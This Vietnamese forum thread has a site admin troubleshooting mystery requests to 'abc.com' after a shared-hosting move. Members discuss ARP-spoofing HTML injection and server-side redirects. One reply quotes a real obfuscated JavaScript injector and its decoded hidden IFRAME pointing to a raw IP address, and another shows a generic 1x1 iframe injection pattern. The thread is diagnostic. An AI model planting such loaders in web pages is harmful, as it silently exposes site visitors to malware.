Tại sao forum mình xuất hiện "waiting for abc.com" ở status bar khi duyệt?

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thảo luận hệ điều hành Windows

Tại sao forum mình xuất hiện "waiting for abc.com" ở status bar khi duyệt?

[Question] Tại sao forum mình xuất hiện "waiting for abc.com" ở status bar khi duyệt?	29/08/2008 05:12:50 (+0700) \| #1 \| 148817

jforum3000
Member

Joined: 26/08/2007 02:53:39
Messages: 1172
Offline

Trước đây forum của mình vẫn hoạt động bình thường, tuy nhiên từ sau khi chuyển sang một nhà cung cấp share host khác (tại VN) thì khi load forum, phía dưới thanh trạng thái (status bar) của trình duyệt Firefox 3 đột nhiên xuất hiện "waiting for abc.com", với abc.com là 1 trang web không được lành mạnh cho lắm? Giống như là forum của mình có chèn code độc để DOS trang abc.com này vậy?

Mình đã kiểm tra lại mã nguồn forum phpBB3 của mình, cũng như view source ở trang HTML kết quả trả về từ web server nhưng ko hề thấy đoạn code nào có phần liên quan đến domain abc.com cả. Hiện tượng này xảy ra khắp forum, chứ không chỉ riêng gì trang xem chủ đề - lúc có chữ kí của thành viên. Và mình cũng ko hề chèn hay cài thêm java script, mod hay tận dụng những tài nguyên (hình ảnh, video, flash, ...) nào có dính dáng đến trang web abc.com này cả.
Mong các bạn giải thích giúp mình nhé, không lẽ do nhà cung cấp share host đã cố ý hay vô tình gây nên hiện tượng này?

PS: Để đỡ bị mang tiếng là quảng cáo, mình xin phép ko nêu tên nhà cung cấp hosting cũng như trang web không lành mạnh này.

[Question] Tại sao forum mình xuất hiện "waiting for abc.com" ở status bar khi duyệt?	29/08/2008 05:33:14 (+0700) \| #2 \| 148821

boom_jt
Member

Joined: 02/08/2007 23:51:10
Messages: 125
Offline

jforum3000 wrote:

...Mình đã kiểm tra lại mã nguồn forum phpBB3 của mình, cũng như view source ở trang HTML kết quả trả về từ web server ...

Có thể bước này bạn làm chưa thật tốt chăng. Hoặc giả cũng có thể máy nào đó trên dải server của bạn bị virus arp ... (trong trường hợp này thì view kết quả html cũng phải tìm thấy smilie

) Bạn check lại các giả thiết này xem, check thêm là server có đảm bảo ko nhé, hàng xóm thăm nhau mà mình chả biết là khổ đó

Nếu ko ngại thì pm cho mình link web của bạn nha, mình nghía thử xem smilie

[Question] Re: Tại sao forum mình xuất hiện "waiting for abc.com" ở status bar khi duyệt?	29/08/2008 05:54:00 (+0700) \| #3 \| 148827

hkvn
Member

Joined: 11/05/2005 15:08:36
Messages: 21
Location: FOTECH
Offline

Máy khác có bị thế ko bạn? Có thể là do virus trên máy bạn tự chèn mã HTML vào khi bạn duyệt.

[Question] Re: Tại sao forum mình xuất hiện "waiting for abc.com" ở status bar khi duyệt?	29/08/2008 06:07:00 (+0700) \| #4 \| 148829

jforum3000
Member

Joined: 26/08/2007 02:53:39
Messages: 1172
Offline

hkvn wrote:

Máy khác có bị thế ko bạn? Có thể là do virus trên máy bạn tự chèn mã HTML vào khi bạn duyệt.

Nguyên nhân virus từ máy của mình có thể loại trừ bạn à, bởi vì mình đã test trên cả Linux và Windows XP (máy mình 2 hệ điều hành), cả 2 đều bị tình trạng này.

boom_jt wrote:

Có thể bước này bạn làm chưa thật tốt chăng. Hoặc giả cũng có thể máy nào đó trên dải server của bạn bị virus arp ... (trong trường hợp này thì view kết quả html cũng phải tìm thấy ) Bạn check lại các giả thiết này xem, check thêm là server có đảm bảo ko nhé, hàng xóm thăm nhau mà mình chả biết là khổ đó

View source ko hề thấy gì liên quan đến domain abc.com đó cả bạn ạ. Hic, cũng với bộ mã nguồn đó mình chạy trên localhost ở nhà thì ko hề thấy tình trạng này, có lẽ nguyên nhân nằm ở nhà cung cấp share host hoặc bạn "hàng xóm" nào chung host với mình rùi.

[Question] Re: Tại sao forum mình xuất hiện "waiting for abc.com" ở status bar khi duyệt?	29/08/2008 06:28:24 (+0700) \| #5 \| 148837

jforum3000
Member

Joined: 26/08/2007 02:53:39
Messages: 1172
Offline

À, mình cũng xin cung cấp thêm chút thông tin là hiện tượng này xuất hiện vào lúc mà forum đã load xong gần hết, lúc đó trình duyệt chạy một phát "waiting for abc.com" ... rùi dừng lại, báo là "Done" - đã load xong như bình thường.

[Question] Re: Tại sao forum mình xuất hiện "waiting for abc.com" ở status bar khi duyệt?	29/08/2008 08:11:01 (+0700) \| #6 \| 148843

jforum3000
Member

Joined: 26/08/2007 02:53:39
Messages: 1172
Offline

Hic, mình lại phát hiện thêm 1 hiện tượng rất lạ thế này:

- Trên thư mục gốc của site mình có file favicon.ico để tạo icon cho website, nếu cứ duyệt trực tiếp cái file icon này trên thanh address của trình duyệt -> http://www.mydomain.com/favicon.ico thì nó wwwect site của mình sang cái trang abc.com kia ngay, cho dù mình đã xóa đi file icon này thì vẫn xảy ra hiện tượng này.

- Nếu thử duyệt trực tiếp với 1 file nào đó khác thì ko bị wwwect (các file hình ảnh, file nén, ...), chỉ khi duyệt đúng cái file favicon.ico ấy là lại bị.

Mình đã post bài thắc mắc này lên diễn đàn hỗ trợ kỹ thuật của nhà cung cấp share host thì lại bị ... xóa bỏ topic ấy đi, mặc dù ko hề vi phạm nội quy gì cả (nói tục, chửi bậy, xúc phạm, bàn về chính trị, ...)

Hic hic, thật là quái đản, ko thể hiểu nổi.

[Question] Re: Tại sao forum mình xuất hiện "waiting for abc.com" ở status bar khi duyệt?	29/08/2008 09:18:12 (+0700) \| #7 \| 148852

jforum3000
Member

Joined: 26/08/2007 02:53:39
Messages: 1172
Offline

Hic, sau khi khảo sát 1 số bà con củng chung share host thì họ cũng bảo là đang bị tình trạng y chang như vậy. Bây giờ thì mình đang nghiêng vê 1 trong 2 khả năng thế này

- Nhà cung cấp host đã cố tình chèn frame vào các khách hàng dùng share host để góp phần hỗ trợ tăng băng thông của site abc.com đó (có lẽ 2 bên đã thoả thuận hợp tác). Vì thế khi bị mình phát hiện thì họ đã xoá luôn bài của mình. Hiện nay forum của mình đã ko còn load dữ liệu từ site abc.com đó nữa, mà bây giờ nó chuyển sang 1 domain khác, domain này chỉ mới được đăng kí gần đây.

- Nhà cung cấp host đã bị tụi khác khống chế, thông qua các loại virus, trojan đã chèn vào những frame này.

[Question] Re: Tại sao forum mình xuất hiện "waiting for abc.com" ở status bar khi duyệt?	29/08/2008 10:03:00 (+0700) \| #8 \| 148860

TheShinichi
Member

Joined: 25/03/2005 01:40:31
Messages: 182
Offline

jforum3000 wrote:

Hic, sau khi khảo sát 1 số bà con củng chung share host thì họ cũng bảo là đang bị tình trạng y chang như vậy. Bây giờ thì mình đang nghiêng vê 1 trong 2 khả năng thế này

- Nhà cung cấp host đã cố tình chèn frame vào các khách hàng dùng share host để góp phần hỗ trợ tăng băng thông của site abc.com đó (có lẽ 2 bên đã thoả thuận hợp tác). Vì thế khi bị mình phát hiện thì họ đã xoá luôn bài của mình. Hiện nay forum của mình đã ko còn load dữ liệu từ site abc.com đó nữa, mà bây giờ nó chuyển sang 1 domain khác, domain này chỉ mới được đăng kí gần đây.

- Nhà cung cấp host đã bị tụi khác khống chế, thông qua các loại virus, trojan đã chèn vào những frame này.

Theo tôi, bạn nên chuyển sang một nhà cung cấp host khác ! Với host hiện tại dù là vô tình hay cố ý thì kết quả cuối cùng vẫn là không chấp nhận được !

P/s : Riêng vụ duyệt cái icon mà nó chuyển sang 1 host khác thì lạ ! Bạn có thấy tận mắt cái icon đó không hay nó đã bị rewrite từ 1 file PHP ?

[Question] Re: Tại sao forum mình xuất hiện "waiting for abc.com" ở status bar khi duyệt?	29/08/2008 14:24:24 (+0700) \| #9 \| 148899

jforum3000
Member

Joined: 26/08/2007 02:53:39
Messages: 1172
Offline

Tình hình là thế này: cứ trên url của site mình mà điểm kết thúc là file favicon.ico là bị wwwect, cho dù là nằm ở thư mục nào, gốc / hay /forum hay /download đều bị.

Tuy nhiên nếu là một cái tên khác, chẳng hạn như favicon2.ico thì ko sao cả, nếu có file icon này tồn tại thì trình duyệt sẽ hiển thị hình ảnh icon này bình thường (tương tự như http://www.google.com/favicon.ico), và sẽ báo lỗi 404 nếu file favicon2.ico này ko tồn tại

Mình đã xoá file favicon.ico lẫn đoạn code chèn icon vào file header của forum thì hiện tượng này vẫn xảy ra.

[Question] Re: Tại sao forum mình xuất hiện "waiting for abc.com" ở status bar khi duyệt?	30/08/2008 09:15:01 (+0700) \| #10 \| 148981

rongchaua
Elite Member

Joined: 19/01/2003 04:09:23
Messages: 124
Offline

To jforum:
- Việc xóa "đoạn code chèn icon vào file header của forum" thì không có nghĩa là bạn sẽ không gọi cái icon đó vì đó là do trình duyệt nó tự động sẽ load favicon. Bạn cứ đơn giản tạo 1 file favicon.ico ở một thư mục bất kỳ và tạo một file index.html rỗng nằm cùng thư mục đó (tạo trên host hoặc localhost). Sau đó dùng trình duyệt xem thư mục đó thì nó sẽ tự động load favicon dù bạn chẳng hề gọi nó trong file index.html.
- Theo tôi đoán thì việc bị wwwect như vầy la do web server đã bị modify ngay trên gốc. Ví dụ server của bluehost bị ai đó wwwect http://69.89.31.121/favicon.ico --> http://rongchaua.net thì bất cứ trang web nào được host trên server này đều sẽ gọi trang http://rongchaua.net cả. Cho nên, vấn đề này bản thân bạn không thể giải quyết được. Nếu được thì liên lạc với nhà cung cấp host hoặc đổi host khác.
Thân.

My website: http://rongchaua.net

[Question] Re: Tại sao forum mình xuất hiện "waiting for abc.com" ở status bar khi duyệt?	30/08/2008 11:02:49 (+0700) \| #11 \| 149003

anhsuytu
Member

Joined: 11/01/2004 03:24:46
Messages: 62
Offline

Có thể web server đã được modify, bạn thử kiểm tra xem có file .htaccess nào ko?

[Question] Re: Tại sao forum mình xuất hiện "waiting for abc.com" ở status bar khi duyệt?	30/08/2008 14:54:01 (+0700) \| #12 \| 149041

jforum3000
Member

Joined: 26/08/2007 02:53:39
Messages: 1172
Offline

anhsuytu wrote:

Có thể web server đã được modify, bạn thử kiểm tra xem có file .htaccess nào ko?

Có file .htaccess, nhưng mình đã mở ra xem và thấy nó được config bình thường, ko hề có dòng nào liên quan đến việc gửi request đến 1 domain nào khác như abc.com cả.

rongchaua wrote:

- Theo tôi đoán thì việc bị wwwect như vầy la do web server đã bị modify ngay trên gốc. Ví dụ server của bluehost bị ai đó wwwect http://69.89.31.121/favicon.ico --> http://rongchaua.net thì bất cứ trang web nào được host trên server này đều sẽ gọi trang http://rongchaua.net cả. Cho nên, vấn đề này bản thân bạn không thể giải quyết được. Nếu được thì liên lạc với nhà cung cấp host hoặc đổi host khác.
Thân.

Cho mình hỏi là web server đã bị modify như thế nào và bằng cách gì mà có thể thực hiện được chuyện này vậy bạn? (Để học hỏi thêm thôi, chứ mình biết là cũng ko thể can thiệp gì được)

[Question] Re: Tại sao forum mình xuất hiện "waiting for abc.com" ở status bar khi duyệt?	31/08/2008 06:30:53 (+0700) \| #13 \| 149128

SuperChicken
Elite Member

Joined: 11/07/2006 18:31:27
Messages: 635
Location: bottom of hell
Offline

Nhà cung cấp host cho bạn có thể đặt server ở 1 data center mà trong đó có 1 máy bị nhiễm virus, nên toàn bộ các server trong mạng đều bị inject HTML. Mình không rành lắm về network, chỉ có thể hiểu đại khái là 1 máy nào đó nhiễm virus, từ đó nó giả danh gateway nên có thể điều khiển luồng packet trả về client, trước khi trả packet về cho end user, nó chèn thêm đoạn mã HTML truy xuất đến trang web chứa mã độc (thường là 1 frame có size 1x1, bạn thử view source để kiểm tra). Rongchaua nói đúng đó, bạn không thể làm gì được trong trường hợp này, chỉ có thể nhờ bên nhà cung cấp host, yêu cầu bên data center xác định được máy bị nhiễm virus thôi.

[Question] Re: Tại sao forum mình xuất hiện "waiting for abc.com" ở status bar khi duyệt?	31/08/2008 09:48:49 (+0700) \| #14 \| 149151

jforum3000
Member

Joined: 26/08/2007 02:53:39
Messages: 1172
Offline

Các ơn các bạn đã giúp đỡ. Cuối cùng thì mình đã tìm ra được đoạn code độc đó rùi, họ dùng một file cron.php, kích thước frame này chỉ là 1x1 pixels
Code:

<img src="./cron.php?cron_type=queue" width="1" height="1" alt="cron" /><div id="wrapfooter">

[Question] Re: Tại sao forum mình xuất hiện "waiting for abc.com" ở status bar khi duyệt?	31/08/2008 10:45:11 (+0700) \| #15 \| 149159

SuperChicken
Elite Member

Joined: 11/07/2006 18:31:27
Messages: 635
Location: bottom of hell
Offline

jforum3000 wrote:

Các ơn các bạn đã giúp đỡ. Cuối cùng thì mình đã tìm ra được đoạn code độc đó rùi, họ dùng một file cron.php, kích thước frame này chỉ là 1x1 pixels
Code:
<img src="./cron.php?cron_type=queue" width="1" height="1" alt="cron" /><div id="wrapfooter">

Hix, cái này thì bạn nhầm rồi, cái link trên là link đến file cron.php của forum bạn mà (thường các forum đều có chức năng cron job để dọn dẹp hoặc làm 1 việc gì đó được scheduled chẳng hạn). Còn đoạn code HTML thường inject sẽ có dạng:
Code:

<iframe src="http://abc.com/..." width="1" height="1" />

[Question] Re: Tại sao forum mình xuất hiện "waiting for abc.com" ở status bar khi duyệt?	31/08/2008 11:04:07 (+0700) \| #16 \| 149162

jforum3000
Member

Joined: 26/08/2007 02:53:39
Messages: 1172
Offline

SuperChicken wrote:

Hix, cái này thì bạn nhầm rồi, cái link trên là link đến file cron.php của forum bạn mà (thường các forum đều có chức năng cron job để dọn dẹp hoặc làm 1 việc gì đó được scheduled chẳng hạn). Còn đoạn code HTML thường inject sẽ có dạng:
Code:
<iframe src="http://abc.com/..." width="1" height="1" />

Hix, tìm theo những từ khoá đó thì ko thấy gì cả smilie

[Question] Re: Tại sao forum mình xuất hiện "waiting for abc.com" ở status bar khi duyệt?	31/08/2008 22:50:46 (+0700) \| #17 \| 149182

cocondihoc
Member

Joined: 27/04/2008 13:15:35
Messages: 61
Offline

Bạn thử kiểm tra lại code đi. Có thể đoạn mã độc đó được dùng kỹ thuật gọi là obfuscation để mã hóa nên bạn sẽ không thể tìm được theo những từ khóa tường minh như abc.com đâu. Trước đây tôi gặp một đoạn mã thế này:

Code:

function O10H486E2F7D05F4A(H486E2F7D06742){ function H486E2F7D06F38() {var H486E2F7D0772F=16;return H486E2F7D0772F;} 
return( parseInt(H486E2F7D06742,H486E2F7D06F38()));}
function H486E2F7D07F28(H486E2F7D08729)
{ var H486E2F7D09F0A = 2; var H486E2F7D08F1C='';for(H486E2F7D09712=0; H486E2F7D09712<H486E2F7D08729.length; H486E2F7D09712+=H486E2F7D09F0A){ H486E2F7D08F1C += ( String.fromCharCode (O10H486E2F7D05F4A(H486E2F7D08729.substr(H486E2F7D09712, H486E2F7D09F0A))));}
return H486E2F7D08F1C;} document.write(H486E2F7D07F28('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3235363735292B27346264313030613833345C272077696474683D3739206865696768743D333235207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));

sau khi decode thì được đoạn như sau:

Code:

<script>if(!myia){d.write('<IFRAME name=O1
 src=\'http://77.221.133.171/.if/go.html?'+Math.round(Math.random()*25675)+'4bd100a834\' width=79
 height=325 style=\'display: none\'></IFRAME >');}var myia=true;</script>

conmale ghi chú: lần sau nên đưa code vào tag code.

[Question] Re: Tại sao forum mình xuất hiện "waiting for abc.com" ở status bar khi duyệt?	02/09/2008 10:38:59 (+0700) \| #18 \| 149359

jforum3000
Member

Joined: 26/08/2007 02:53:39
Messages: 1172
Offline

Hic, tuy chưa tìm được đoạn code chèn frame (nếu có) nhưng mình đã biết lý do tại sao lại xảy ra nguyên nhân rùi, do nhà cung cấp shared host bị forum abc.com tấn công DOS nên đã dùng giải pháp này để đáp trả lại bọn chúng. Hic, cứ oan oan tương báo như vậy thì đến bao giờ an ninh mạng mới phát triển được nhỉ? Buồn thay ...
Họ PM cho mình biết lý do xảy ra chuyện này như thế, và mình đã gửi lại lời khuyên như đoạn post trên...

[Question] Re: Tại sao forum mình xuất hiện "waiting for abc.com" ở status bar khi duyệt?	03/09/2008 00:05:44 (+0700) \| #19 \| 149435

TheShinichi
Member

Joined: 25/03/2005 01:40:31
Messages: 182
Offline

jforum3000 wrote:

Hic, tuy chưa tìm được đoạn code chèn frame (nếu có) nhưng mình đã biết lý do tại sao lại xảy ra nguyên nhân rùi, do nhà cung cấp shared host bị forum abc.com tấn công DOS nên đã dùng giải pháp này để đáp trả lại bọn chúng. Hic, cứ oan oan tương báo như vậy thì đến bao giờ an ninh mạng mới phát triển được nhỉ? Buồn thay ...
Họ PM cho mình biết lý do xảy ra chuyện này như thế, và mình đã gửi lại lời khuyên như đoạn post trên...

Nhà cung cấp host nào mà lại có cách hành xử thiếu chuyên nghiệp và hơi có vẻ cay cú ăn thua như trẻ con như vậy ?

Go to:

Users currently in here
1 Anonymous